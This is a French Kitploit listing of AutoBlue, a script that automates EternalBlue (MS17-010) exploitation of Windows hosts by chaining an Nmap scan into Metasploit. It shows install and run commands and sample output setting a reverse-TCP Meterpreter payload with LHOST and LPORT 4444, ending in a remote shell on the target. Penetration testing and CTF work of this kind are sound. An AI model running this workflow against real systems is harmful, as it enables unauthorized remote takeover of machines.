Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
autoblue — AutoBlue - Outil d'exploitation automatisé d'EternalBlue (CVE-2017-0144 / MS17-010) utilisant Nmap et Metasploit pour le hacking éthique, les tests d'intrusion et les défis CTF. Strictement réservé à un usage autorisé et éducatif uniquement ! | Kitploit
Outils/GitHubGitHub/atithkhawas/autoblue
Scanners de VulnérabilitésGénération de PayloadsExploitationPost-ExploitationCTFTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubatithkhawas/autoblue

autoblue

AutoBlue - Outil d'exploitation automatisé d'EternalBlue (CVE-2017-0144 / MS17-010) utilisant Nmap et Metasploit pour le hacking éthique, les tests d'intrusion et les défis CTF. Strictement réservé à un usage autorisé et éducatif uniquement !

Voir le dépôt
413il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

AUTOBLUE : Outil automatisé d'exploitation EternalBlue

AUTOBLUE est un outil d'automatisation conçu pour exploiter la vulnérabilité EternalBlue (CVE-2017-0144) sur les machines Windows. L'outil intègre la puissance de Nmap pour le scan de vulnérabilités et de msfconsole de Metasploit pour l'exploitation, permettant aux utilisateurs d'identifier automatiquement les systèmes vulnérables et de lancer l'exploit EternalBlue pour obtenir un accès distant à la cible.

Cet outil est principalement conçu pour les professionnels de la sécurité, les testeurs d'intrusion et les hackers éthiques travaillant dans des environnements contrôlés et autorisés, tels que les challenges Capture The Flag (CTF), les engagements de test d'intrusion ou les configurations de laboratoire. AUTOBLUE permet aux utilisateurs d'exploiter la vulnérabilité EternalBlue avec une intervention manuelle minimale, simplement en saisissant l'adresse IP cible.

Fonctionnalités

  • Scan automatisé des vulnérabilités : Utilise Nmap pour rechercher la vulnérabilité EternalBlue (CVE-2017-0144) sur la machine cible.

  • Exploitation transparente : Utilise msfconsole de Metasploit pour lancer automatiquement l'exploit EternalBlue.

  • Configuration simple : Nécessite uniquement une adresse IP cible et un environnement de travail avec Nmap et Metasploit installés.

  • Rapport de sortie : Génère une sortie indiquant le succès ou l'échec de la tentative d'exploitation.

Table des matières

  • Prérequis

  • Installation

  • Utilisation

  • Fonctionnement

  • Considérations de sécurité

  • Contribution

  • Licence

  • Remerciements

  • Avertissement

  • Prérequis :

    Avant d'utiliser AUTOBLUE, assurez-vous que les outils suivants sont installés sur votre machine :

    Nmap : Un outil de scan réseau pour détecter les machines vulnérables.

    Metasploit Framework : Une plateforme de test d'intrusion qui inclut des exploits pour EternalBlue.

    Installer Nmap :

    • Sous Linux (basé sur Debian) :

    Copier le code

    root@kitploit:~
          sudo apt update
    

    et

    root@kitploit:~
          sudo apt install nmap
    

    Sous Windows ou macOS, téléchargez Nmap depuis le site officiel.

    Installer Metasploit :

    Sous Linux (basé sur Debian) :

    Copier le code

    root@kitploit:~
          sudo apt update
    

    et

    root@kitploit:~
         sudo apt install metasploit-framework
         
    

    Sous Windows ou macOS, téléchargez Metasploit depuis le site officiel.

    Installation :

    Pour installer AUTOBLUE, suivez ces étapes :

    • Clonez le dépôt :

      root@kitploit:~
        git clone https://github.com/AtithKhawas/autoblue.git
      

      et

      root@kitploit:~
           cd autoblue
      

    Assurez-vous que Nmap et Metasploit sont correctement installés comme prérequis.

    • Rendez le script exécutable :

      root@kitploit:~
      chmod +x autoblue.sh
      

    Utilisation :

    AUTOBLUE est conçu pour automatiser le scan et l'exploitation de la vulnérabilité EternalBlue. Voici comment l'utiliser :

    • Lancez l'outil

    Pour utiliser AUTOBLUE, exécutez la commande suivante dans votre terminal :

    Copier le code

    root@kitploit:~
         ./autoblue.sh 
    

    Sortie :

    root@kitploit:~
         ┌──(root㉿kali)-[/home/Elliot] 
         └─# ./autoblue.sh 
         ============================================
         ********************************************
         AutoBlue    - EternalBlue Exploit Automation
         ********************************************
         ********************************************
         ------------------------Made by ATITH KHAWAS
         ============================================
         Enter Target IP Address:
    

    Il vous demandera l'adresse IP cible et la vôtre.

    Exemple

    root@kitploit:~
          Enter Target IP Address: Target<IP Address>
          Enter Your IP Address: Your <IP Address>
    

    Une fois l'outil lancé, il commencera le scan avec Nmap :

    Sortie-1

    root@kitploit:~
     Target IP Address: ***.***.**.**
     [+] Scanning Target for MS17-010 Vulnerability...
     Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 12:41 EST
     Nmap scan report for ***.***.**.**
     Host is up (0.19s latency).
    
     PORT    STATE SERVICE
     445/tcp open  microsoft-ds
    
     Host script results:
     | smb-vuln-ms17-010: 
     |   VULNERABLE:
     |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
     |     State: VULNERABLE
     |     IDs:  CVE:CVE-2017-0143
     |     Risk factor: HIGH
     |       A critical remote code execution vulnerability exists in Microsoft SMBv1
     |        servers (ms17-010).
     |           
     |     Disclosure date: 2017-03-14
     |     References:
     |       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
     |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
     |_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
    
     Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
     [+] Target is VULNERABLE to EternalBlue!
    

    C'est là que le vrai travail commence, réduisant considérablement le processus chronophage. Si la cible est vulnérable, il lance automatiquement Msfconsole et définit RHOSTS, PAYLOAD, LHOST et LPORT avec le port par défaut 4444.

    Sortie-2

    root@kitploit:~
          [+] Launching Metasploit...
          [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
          RHOSTS => ***.***.**.**
          PAYLOAD => windows/x64/meterpreter/reverse_tcp
          LHOST => ***.***.**.**
          LPORT => 4444
          [*] Started reverse TCP handler on ***.***.**.**:4444 
    

    Et nous donne le Shell Meterpreter de la cible.

    Sortie-3

    root@kitploit:~
           [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
           [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
           [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    
           meterpreter > pwd
           C:\Windows\system32
    

    Fonctionnement :

    • Scan via script Nmap : L'outil utilise d'abord Nmap Script Scan (--script smb-vuln-ms17-010) pour détecter si la machine cible est vulnérable à l'exploit EternalBlue. Il vérifie si le port 445 est ouvert et tente d'identifier les vulnérabilités SMB.

    • Exploit Metasploit : Si la machine cible est trouvée vulnérable, AUTOBLUE procède au lancement de l'exploit EternalBlue en utilisant msfconsole de Metasploit. Le script configure et envoie la charge utile nécessaire pour exploiter la vulnérabilité.

    • Shell inverse : Si l'exploitation réussit, un shell inverse est ouvert pour fournir une interface en ligne de commande sur la machine victime.

    • Retour d'information : L'outil fournit un retour d'information tout au long du processus, y compris si la cible a été exploitée avec succès, et affiche toute information pertinente (par exemple, l'adresse IP du shell inverse).

    Considérations de sécurité :

    • Utilisation légale : Cet outil ne doit être utilisé que dans des environnements autorisés. Assurez-vous d'avoir une autorisation explicite pour tester la machine cible et que cela n'est pas illégal dans votre juridiction.

    • Saisie utilisateur : Assurez-vous que seules des IP de confiance sont fournies à l'outil pour éviter toute utilisation abusive. L'exécution de cet outil sur des systèmes non fiables pourrait entraîner des incidents de sécurité.

    • Sécurité de la charge utile : La charge utile du shell inverse utilisée dans cet outil est intrinsèquement risquée. N'exposez pas la machine d'attaque ou ses écouteurs à des réseaux non fiables.

    • Mettez à jour les dépendances : Assurez-vous de mettre régulièrement à jour Nmap et Metasploit pour atténuer les vulnérabilités de sécurité connues dans ces outils.

    Contribution :

    Les contributions au projet AUTOBLUE sont les bienvenues. Si vous avez des suggestions, des améliorations ou des corrections de bogues, n'hésitez pas à forker le dépôt et à créer une pull request.

    Licence :

    Cet outil est open-source et distribué sous la licence MIT. Vous êtes libre d'utiliser, modifier et distribuer le logiciel dans vos propres projets. Cependant, vous devez inclure cet avis dans toutes les copies ou portions substantielles du logiciel.

    Remerciements :

    • Nmap : Pour fournir la fonctionnalité essentielle de scan de vulnérabilités.

    • Metasploit : Pour fournir le framework permettant d'exploiter la vulnérabilité EternalBlue.

    • Chercheurs en sécurité : Pour avoir découvert et divulgué publiquement la vulnérabilité EternalBlue, ce qui a aidé à sécuriser les systèmes dans le monde entier.

    Avertissement :

    AUTOBLUE est un outil destiné à un usage éducatif et éthique uniquement. Les auteurs ne sont pas responsables des actions illégales entreprises avec cet outil. Il est de votre responsabilité de vous assurer que vous avez l'autorisation explicite d'effectuer des tests d'intrusion sur tout système.

    Utilisez cet outil à vos risques et périls. Effectuez toujours les activités de test d'intrusion dans un environnement sûr et légal.

    Télécharger l’outil